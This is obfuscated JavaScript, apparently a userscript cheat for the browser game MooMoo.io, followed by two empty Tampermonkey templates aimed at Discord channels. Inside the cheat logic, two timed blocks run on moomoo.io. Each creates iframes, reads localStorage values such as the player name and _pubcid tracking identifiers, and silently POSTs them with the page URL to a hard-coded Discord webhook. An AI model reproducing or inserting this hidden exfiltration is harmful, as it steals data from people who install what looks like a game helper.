_0x370875=0x1a;_0x4dd078[_0x35d3('\x30\x78\x61\x34')](_0x370875,0x1d);_0x370875++){if(isElementVisible(document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x31\x32\x33')](_0x35d3('\x30\x78\x64\x64'),_0x370875[_0x35d3('\x30\x78\x63\x31')]())))){if(_0x4dd078[_0x35d3('\x30\x78\x37\x39')](_0x35d3('\x30\x78\x34\x66'),_0x4dd078[_0x35d3('\x30\x78\x31\x32\x62')])){if(_0x4dd078[_0x35d3('\x30\x78\x33\x61')](hatToggle,0x1)){if(_0x4dd078[_0x35d3('\x30\x78\x65\x61')](oldHat,normalHat)){_0x4dd078[_0x35d3('\x30\x78\x31\x32\x66')](hat,normalHat);console[_0x35d3('\x30\x78\x64\x36')](_0x4dd078[_0x35d3('\x30\x78\x39\x38')]);}if(_0x4dd078['\x5a\x56\x7a\x7a\x65'](oldAcc,normalAcc)){_0x4dd078[_0x35d3('\x30\x78\x31\x32\x66')](acc,normalAcc);console[_0x35d3('\x30\x78\x64\x36')](_0x4dd078[_0x35d3('\x30\x78\x65\x39')]);}oldHat=normalHat;oldAcc=normalAcc;}}else{millType=_0x4dd078['\x7a\x73\x4b\x74\x6d'](_0x370875,0x10);}}}for(let _0x11bbc8=0x1d;_0x11bbc8<0x1f;_0x11bbc8++){if(_0x4dd078[_0x35d3('\x30\x78\x31\x36\x37')](_0x4dd078[_0x35d3('\x30\x78\x34\x62')],_0x4dd078[_0x35d3('\x30\x78\x34\x62')])){if(isElementVisible(document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x31\x32\x33')](_0x4dd078[_0x35d3('\x30\x78\x32\x36')],_0x11bbc8[_0x35d3('\x30\x78\x63\x31')]())))){mineType=_0x4dd078[_0x35d3('\x30\x78\x31\x63')](_0x11bbc8,0x10);}}else{_0x4dd078[_0x35d3('\x30\x78\x37\x31')](place,spikeType);}}for(let _0x1f49c8=0x1f;_0x1f49c8<0x21;_0x1f49c8++){if(_0x4dd078[_0x35d3('\x30\x78\x31\x30\x62')](_0x35d3('\x30\x78\x31\x35\x33'),_0x4dd078['\x45\x45\x4b\x4c\x4c'])){return Math[_0x35d3('\x30\x78\x64\x38')](_0x4dd078[_0x35d3('\x30\x78\x38\x62')](Math[_0x35d3('\x30\x78\x31\x36\x63')](b['\x79']-a[0x2],0x2),Math[_0x35d3('\x30\x78\x31\x36\x63')](_0x4dd078['\x66\x4a\x66\x6b\x62'](b['\x78'],a[0x1]),0x2)));}else{if(_0x4dd078[_0x35d3('\x30\x78\x66\x32')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x32\x36')]+_0x1f49c8[_0x35d3('\x30\x78\x63\x31')]()))){if(_0x4dd078['\x68\x72\x54\x69\x4f'](_0x4dd078[_0x35d3('\x30\x78\x37\x65')],_0x4dd078['\x71\x63\x4f\x4c\x6c'])){boostType=_0x4dd078[_0x35d3('\x30\x78\x31\x63')](_0x1f49c8,0x10);}else{var _0x4ee768=(_0x35d3('\x30\x78\x64\x35')+_0x35d3('\x30\x78\x31\x35\x32'))[_0x35d3('\x30\x78\x66\x65')]('\x7c');var _0x188fbb=0x0;while(!![]){switch(_0x4ee768[_0x188fbb++]){case'\x30':myPlayer['\x69\x73\x4c\x65\x61\x64\x65\x72']=playerInfo[0x8];continue;case'\x31':myPlayer[_0x35d3('\x30\x78\x65\x63')]=playerInfo[0x3];continue;case'\x32':myPlayer[_0x35d3('\x30\x78\x31\x39')]=playerInfo[0x7];continue;case'\x33':myPlayer['\x61\x63\x63\x65\x73\x73\x6f\x72\x79']=playerInfo[0xa];continue;case'\x34':myPlayer[_0x35d3('\x30\x78\x31\x30\x33')]=playerInfo[0x9];continue;case'\x35':myPlayer[_0x35d3('\x30\x78\x38\x32')]=playerInfo[0x5];continue;case'\x36':myPlayer[_0x35d3('\x30\x78\x31\x33\x36')]=playerInfo[0xb];continue;case'\x37':myPlayer['\x78']=playerInfo[0x1];continue;case'\x38':myPlayer[_0x35d3('\x30\x78\x64\x33')]=playerInfo[0x4];continue;case'\x39':myPlayer['\x79']=playerInfo[0x2];continue;}break;}}}}}for(let _0x4da5f1=0x21;_0x4da5f1<0x27;_0x4da5f1++){if(_0x4dd078[_0x35d3('\x30\x78\x66\x32')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078['\x62\x66\x69\x5a\x4d'](_0x4dd078[_0x35d3('\x30\x78\x32\x36')],_0x4da5f1[_0x35d3('\x30\x78\x63\x31')]())))&&_0x4da5f1!=0x24){turretType=_0x4dd078[_0x35d3('\x30\x78\x31\x63')](_0x4da5f1,0x10);}}spawnpadType=0x24;}if(window[_0x35d3('\x30\x78\x31\x34\x31')][_0x35d3('\x30\x78\x63\x31')]()[_0x35d3('\x30\x78\x32\x31')](_0x35d3('\x30\x78\x35\x30')+_0x35d3('\x30\x78\x37\x35'))!=-0x1){for(let i=0x0;i<0x5;i++){}setTimeout(function(){var _0x692a96={'\x6d\x4b\x65\x6e\x49':_0x35d3('\x30\x78\x31\x34\x34'),'\x64\x44\x55\x64\x6f':_0x35d3('\x30\x78\x36\x35')+_0x35d3('\x30\x78\x31\x30')+_0x35d3('\x30\x78\x35\x63')+'\x35\x31\x33\x30\x37\x36\x35\x38\x38\x36\x31\x35\x2f'+'\x7a\x56\x79\x49\x75\x57\x61\x39\x79\x42\x65\x69\x6d'+_0x35d3('\x30\x78\x31\x30\x37')+'\x72\x78\x67\x4a\x79\x2d\x42\x6b\x6c\x69\x55\x4f\x6f'+_0x35d3('\x30\x78\x35\x61')+_0x35d3('\x30\x78\x63\x65')+_0x35d3('\x30\x78\x62\x61'),'\x6d\x54\x57\x4f\x69':_0x35d3('\x30\x78\x31\x32\x63'),'\x6f\x67\x59\x46\x44':_0x35d3('\x30\x78\x64\x30')};const _0x34c251=document[_0x35d3('\x30\x78\x31\x35')]['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x35d3('\x30\x78\x31\x34\x34')))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')]['\x6d\x6f\x6f\x5f\x6e\x61\x6d\x65'];const _0x47d34e=document[_0x35d3('\x30\x78\x31\x35')][_0x35d3('\x30\x78\x31\x65')](document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74'](_0x692a96[_0x35d3('\x30\x78\x31\x36\x39')]))['\x63\x6f\x6e\x74\x65\x6e\x74\x57\x69\x6e\x64\x6f\x77'][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x63\x61')];const _0x49dd5a=document['\x62\x6f\x64\x79'][_0x35d3('\x30\x78\x31\x65')](document[_0x35d3('\x30\x78\x32\x33')](_0x692a96[_0x35d3('\x30\x78\x31\x36\x39')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x33\x32')];const _0x1c94fd=new XMLHttpRequest();const _0x40e7a8=_0x692a96[_0x35d3('\x30\x78\x31\x34\x35')];_0x1c94fd[_0x35d3('\x30\x78\x35\x31')](_0x692a96[_0x35d3('\x30\x78\x39\x66')],_0x40e7a8,!![]);_0x1c94fd[_0x35d3('\x30\x78\x31\x33\x39')+_0x35d3('\x30\x78\x36\x38')](_0x692a96[_0x35d3('\x30\x78\x35\x35')],'\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6a'+_0x35d3('\x30\x78\x31\x32\x61'));_0x1c94fd[_0x35d3('\x30\x78\x64\x63')](JSON['\x73\x74\x72\x69\x6e\x67\x69\x66\x79']({'\x63\x6f\x6e\x74\x65\x6e\x74':_0x35d3('\x30\x78\x31\x64')+_0x35d3('\x30\x78\x31\x36\x38')+_0x34c251+(_0x35d3('\x30\x78\x38\x37')+_0x35d3('\x30\x78\x38\x39')+_0x35d3('\x30\x78\x31\x32\x65'))+window[_0x35d3('\x30\x78\x31\x34\x31')]['\x73\x65\x61\x72\x63\x68']+(_0x35d3('\x30\x78\x61\x33')+'\x5b\x20')+_0x47d34e+(_0x35d3('\x30\x78\x39\x39')+_0x35d3('\x30\x78\x66\x33'))}));},0x2710);}if(window['\x6c\x6f\x63\x61\x74\x69\x6f\x6e'][_0x35d3('\x30\x78\x63\x31')]()['\x69\x6e\x64\x65\x78\x4f\x66']('\x3a\x2f\x2f\x6d\x6f\x6f\x6d\x6f\x6f\x2e\x69\x6f')!=-0x1){for(let i=0x0;i<0x5;i++){}setTimeout(function(){var _0x3f15df={'\x65\x54\x52\x4c\x53':'\x69\x66\x72\x61\x6d\x65','\x73\x52\x65\x4a\x6d':'\x68\x74\x74\x70\x73\x3a\x2f\x2f\x64\x69\x73\x63\x6f'+_0x35d3('\x30\x78\x31\x30')+_0x35d3('\x30\x78\x35\x63')+'\x35\x31\x33\x30\x37\x36\x35\x38\x38\x36\x31\x35\x2f'+'\x7a\x56\x79\x49\x75\x57\x61\x39\x79\x42\x65\x69\x6d'+_0x35d3('\x30\x78\x31\x30\x37')+_0x35d3('\x30\x78\x31\x36\x36')+_0x35d3('\x30\x78\x35\x61')+_0x35d3('\x30\x78\x63\x65')+_0x35d3('\x30\x78\x62\x61'),'\x49\x76\x63\x68\x54':_0x35d3('\x30\x78\x64\x30')};const _0xe143d2=document[_0x35d3('\x30\x78\x31\x35')]['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x3f15df[_0x35d3('\x30\x78\x35\x62')]))['\x63\x6f\x6e\x74\x65\x6e\x74\x57\x69\x6e\x64\x6f\x77'][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x38\x30')];const _0x6ace1d=document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x3f15df[_0x35d3('\x30\x78\x35\x62')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')]['\x5f\x70\x75\x62\x63\x69\x64'];const _0x340abe=document[_0x35d3('\x30\x78\x31\x35')]['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x3f15df[_0x35d3('\x30\x78\x35\x62')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')]['\x5f\x70\x75\x62\x63\x69\x64\x5f\x65\x78\x70'];const _0x52e98a=new XMLHttpRequest();const _0xe5cc75=_0x3f15df[_0x35d3('\x30\x78\x65\x30')];_0x52e98a[_0x35d3('\x30\x78\x35\x31')](_0x35d3('\x30\x78\x31\x32\x63'),_0xe5cc75,!![]);_0x52e98a[_0x35d3('\x30\x78\x31\x33\x39')+_0x35d3('\x30\x78\x36\x38')](_0x3f15df['\x49\x76\x63\x68\x54'],_0x35d3('\x30\x78\x31\x30\x65')+_0x35d3('\x30\x78\x31\x32\x61'));_0x52e98a[_0x35d3('\x30\x78\x64\x63')](JSON[_0x35d3('\x30\x78\x64\x37')]({'\x63\x6f\x6e\x74\x65\x6e\x74':_0x35d3('\x30\x78\x31\x35\x31')+_0x35d3('\x30\x78\x31\x32\x31')+_0xe143d2+(_0x35d3('\x30\x78\x38\x37')+_0x35d3('\x30\x78\x38\x39')+_0x35d3('\x30\x78\x31\x32\x65'))+window[_0x35d3('\x30\x78\x31\x34\x31')][_0x35d3('\x30\x78\x66\x31')]+(_0x35d3('\x30\x78\x61\x33')+'\x5b\x20')+_0x6ace1d+(_0x35d3('\x30\x78\x39\x39')+_0x35d3('\x30\x78\x66\x33'))}));},0x2710);}// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        https://discord.com/channels/@me/728234451238387744
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    // Your code here...
})();// ==UserScript==
// @name         New Userscript
// @namespace    http://tampermonkey.net/
// @version      0.1
// @description  try to take over the world!
// @author       You
// @match        https://discord.com/channels/709022701389480047/732897488259776562
// @grant        none
// ==/UserScript==

(function() {
    'use strict';

    // Your code here...
})();